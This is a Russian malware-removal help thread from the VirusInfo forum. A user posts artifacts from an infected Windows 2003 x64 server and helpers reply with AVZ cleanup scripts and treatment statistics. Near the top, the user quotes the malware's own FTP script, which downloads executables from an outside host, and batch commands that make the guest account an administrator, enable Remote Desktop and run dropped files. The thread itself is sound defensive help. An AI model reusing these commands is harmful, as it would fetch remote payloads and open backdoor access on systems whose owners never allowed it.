Trojan-Downloader.BAT.Small.f

создает процесс ftp.exe и папки \WINDOWS\system32\i<4цифры>
в папке файл i c содержимым:
open YROMK.in.into4.info
Syn
123
mget *.exe
bye
(не меняется только in.into4.info)

ftp.exe по несколько процессов и постоянно лезет в интернет

в процессе разгребания было найдено это: [URL]https://www.virustotal.com/file/aa0152b26fc7533d2d6e3a06105aa6a9c27c01a89f63dacb108ed1f0f0d6e755/analysis/1334751300/[/URL]

и батники: раз
ping 127.0.0.1
123h.exe.exe
ping 127.0.0.1
c:\123h.exe.exe

два
net user guest 3297201
net localgroup administrators guest /add
net user guest /active:yes
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"

три
for %%i in (*.exe) do start %%i
for %%i in (*.exe) do %%i
del /f /q %0%

в журнале аудита полно успешного входа от анонимного пользователя

помогите найти откуда ноги растут?

Уважаемый(ая) [B]nAPACEHAK[/B], спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Убить ОС? :(

Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\WINDOWS\System32\h.exe','');
QuarantineFile('C:\WINDOWS\System32\g.exe','');
QuarantineFile('C:\WINDOWS\System32\f.exe','');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end. [/code]Компьютер перезагрузится.

Пришлите карантин согласно [B]Приложения 2[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

выполнено.
папка с карантином пустая
касперский RT в безопасном режиме не находит ничего
процесс ftp.exe прибит фаерволлом адрес куда ломится. в TCPView процесс ftp.exe появляется и сразу закрывается. (если адрес не прибивать то плодится штук 5-6-7 процессов и висят активными)
после как ftp.exe открывается в папке WINDOWS\SysWOW64 появляется очередной каталог i<4 цифры>

У Вас серверная система или просто x64? В любом случае обновлений на нее явно никогда не устанавливалось. Вот и орудует у Вас сетевой червяк

Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\WINDOWS\system32\user.exe','');
QuarantineFile('C:\WINDOWS\system32\pyldwo.exe','');
DeleteService('DSLserveremsp');
DeleteService('Ghijkl Nopqrstu Wxy');
DeleteFile('C:\WINDOWS\system32\pyldwo.exe');
DeleteFile('C:\WINDOWS\System32\f.exe');
DeleteFile('C:\WINDOWS\System32\g.exe');
DeleteFile('C:\WINDOWS\System32\h.exe');
DeleteFile('C:\WINDOWS\Tasks\52392.job');
DeleteFile('C:\WINDOWS\Tasks\52391.job');
DeleteFile('C:\WINDOWS\Tasks\52390.job');
DeleteFile('C:\WINDOWS\Tasks\52393.job');
DeleteFile('C:\WINDOWS\Tasks\52394.job');
DeleteFile('C:\WINDOWS\Tasks\52395.job');
DeleteFile('C:\WINDOWS\Tasks\52396.job');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end. [/code]Компьютер перезагрузится.

Пришлите карантин согласно [B]Приложения 2[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

Сделайте новые логи

[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]

Сделайте лог [url="http://virusinfo.info/showpost.php?p=457118&postcount=1"]полного сканирования МВАМ[/url]

windows 2k3 x64

Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
end;
QuarantineFile('C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\1VECWIJS\GengXin[1].exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\WINDOWS\system32\gengxin.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\WINDOWS\system32\mcsql.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\sh1.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\sh360up.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\shVIP1433.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp1.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp123.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp123h.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp1433.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp360up.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xp5.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpDK.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpKabasiji.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpq.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpserver.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpsetup.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\xpsvchost.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zy1.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zy123.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zy3.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zy360up.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zy5.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zyDK.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zyKabasiji.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zyq.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zyServer.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zysetup.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zysvchost.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zytest.exe', 'MBAM: Trojan.Agent');
QuarantineFile('C:\RECYCLER\zyVIP1433.exe', 'MBAM: Trojan.Agent');
DeleteFile('C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\1VECWIJS\GengXin[1].exe');
DeleteFile('C:\WINDOWS\system32\gengxin.exe');
DeleteFile('C:\WINDOWS\system32\mcsql.exe');
DeleteFile('C:\RECYCLER\sh1.exe');
DeleteFile('C:\RECYCLER\sh360up.exe');
DeleteFile('C:\RECYCLER\shVIP1433.exe');
DeleteFile('C:\RECYCLER\xp1.exe');
DeleteFile('C:\RECYCLER\xp123.exe');
DeleteFile('C:\RECYCLER\xp123h.exe');
DeleteFile('C:\RECYCLER\xp1433.exe');
DeleteFile('C:\RECYCLER\xp360up.exe');
DeleteFile('C:\RECYCLER\xp5.exe');
DeleteFile('C:\RECYCLER\xpDK.exe');
DeleteFile('C:\RECYCLER\xpKabasiji.exe');
DeleteFile('C:\RECYCLER\xpq.exe');
DeleteFile('C:\RECYCLER\xpserver.exe');
DeleteFile('C:\RECYCLER\xpsetup.exe');
DeleteFile('C:\RECYCLER\xpsvchost.exe');
DeleteFile('C:\RECYCLER\zy1.exe');
DeleteFile('C:\RECYCLER\zy123.exe');
DeleteFile('C:\RECYCLER\zy3.exe');
DeleteFile('C:\RECYCLER\zy360up.exe');
DeleteFile('C:\RECYCLER\zy5.exe');
DeleteFile('C:\RECYCLER\zyDK.exe');
DeleteFile('C:\RECYCLER\zyKabasiji.exe');
DeleteFile('C:\RECYCLER\zyq.exe');
DeleteFile('C:\RECYCLER\zyServer.exe');
DeleteFile('C:\RECYCLER\zysetup.exe');
DeleteFile('C:\RECYCLER\zysvchost.exe');
DeleteFile('C:\RECYCLER\zytest.exe');
DeleteFile('C:\RECYCLER\zyVIP1433.exe');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end.[/code]Компьютер перезагрузите вручную

Пришлите карантин согласно [B]Приложения 2[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

Установите все обновления для Вашей системы

[url="http://virusinfo.info/showpost.php?p=493584&postcount=2"]Удалите в МВАМ[/url] все, [b]кроме[/b] [code]D:\Distr\UltraMon\Realtime.Soft.UltraMon.v3.1.0.x64-CRD\crd.exe (TheftMarker.Crude) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\1200_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\14400_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\19200_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\2400_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\38400_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\4800_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\57600_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\600_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.
D:\Navitel\Штурман\Navitel_5.1.0.48\Change_Navitel_Speed\9600_Patch.exe (RiskWare.Tool.CK) -> Действие не было предпринято.[/code]

с обновлениями системы сложновато и:(

[quote="nAPACEHAK;885662"]с обновлениями системы сложновато[/quote]А жить с сетевым червяком и загрузчиками прочей дряни проще? Тогда зачем вообще лечиться

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]4[/B][*]Обработано файлов: [B]67[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\1vecwijs\\gengxin[1].exe - [B]Trojan-GameThief.Win32.Magania.ggzl[/B] ( DrWEB: Trojan.DownLoader5.23112, BitDefender: Trojan.Generic.7300037, AVAST4: Win32:Farfli-AA [Drp] )[*] c:\\recycler\\sh1.exe - [B]Trojan-Downloader.BAT.Small.f[/B][*] c:\\recycler\\sh360up.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\xpkabasiji.exe - [B]Trojan-Downloader.BAT.Small.aq[/B][*] c:\\recycler\\xpq.exe - [B]Trojan-Downloader.BAT.Small.aq[/B][*] c:\\recycler\\xp1.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\xp123.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\xp1433.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\xp360up.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\xp5.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\zykabasiji.exe - [B]Trojan-Downloader.BAT.Small.aq[/B][*] c:\\recycler\\zyq.exe - [B]Trojan-Downloader.BAT.Small.aq[/B][*] c:\\recycler\\zyserver.exe - [B]Trojan-Downloader.BAT.Small.aq[/B][*] c:\\recycler\\zy1.exe - [B]Trojan-Downloader.BAT.Small.f[/B][*] c:\\recycler\\zy123.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\zy3.exe - [B]Trojan-Downloader.BAT.Small.f[/B][*] c:\\recycler\\zy360up.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\recycler\\zy5.exe - [B]Trojan-Downloader.BAT.Small.f[/B] ( AVAST4: BV:Ftp-AR [Trj] )[*] c:\\windows\\system32\\gengxin.exe - [B]Trojan-GameThief.Win32.Magania.ggzl[/B] ( DrWEB: Trojan.DownLoader5.23112, BitDefender: Trojan.Generic.7300037, AVAST4: Win32:Farfli-AA [Drp] )[*] c:\\windows\\system32\\mcsql.exe - [B]Trojan-GameThief.Win32.Magania.gesr[/B] ( DrWEB: Trojan.DownLoader5.23112, BitDefender: Trojan.Generic.7124337, AVAST4: Win32:Farfli-AA [Drp] )[/LIST][/LIST]